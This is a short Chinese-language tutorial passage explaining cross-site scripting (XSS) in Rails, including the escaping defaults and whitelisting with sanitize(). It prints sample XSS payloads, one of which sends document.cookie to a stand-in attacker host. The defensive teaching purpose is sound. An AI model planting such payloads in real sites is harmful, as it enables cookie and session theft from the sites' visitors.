XSS可说是网站界第一名常见的攻击模式,恶意的使用者可以将脚本程式码放在网页上让其他使用者执行,任何可以让使用者输入资料的网站,都必须小心这个问题。例如可以将以下的程式贴到网页上:
<script>alert('HACK YOU!');</script>
<img src=javascript:alert('HACK YOU!')>
<table background="javascript:alert('HACK YOU!')">
<script>document.write(document.cookie);</script>
<script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script>
当一般使用者浏览到这一页时,就会跳出alert视窗,或是将敏感资料例如cookie内容传给攻击者。
要防范这个问题的方法,就是要逸出使用者输入的内容,例如将
`"<p>safe</p>".html_safe
# 或
raw("<p>safe</p>")`
在Rails 3之前不会自动逸出,因此在样板中需要加escapeHTML()或h()方法。也因为很多人常常会忘记造成XSS漏洞,所以在Rails 3之后就改成默认逸出了。
关于如何在 Rails Helper 中正确处理逸出 HTML,请参考「Action View - Helpers 方法」的 如何安全地处理HTML逸出问题? 一节。
如何开放使用者张贴HTML
但是有时候我们还是必须开放让使用者可以张贴简单的HTML内容,例如超连结、图片、标题等等。这时候我们可以用白名单的作法,Rails提供了sanitize()方法可以过滤逸出。
即使使用Textile或Markdown语法,你还是必须过滤HTML标籤。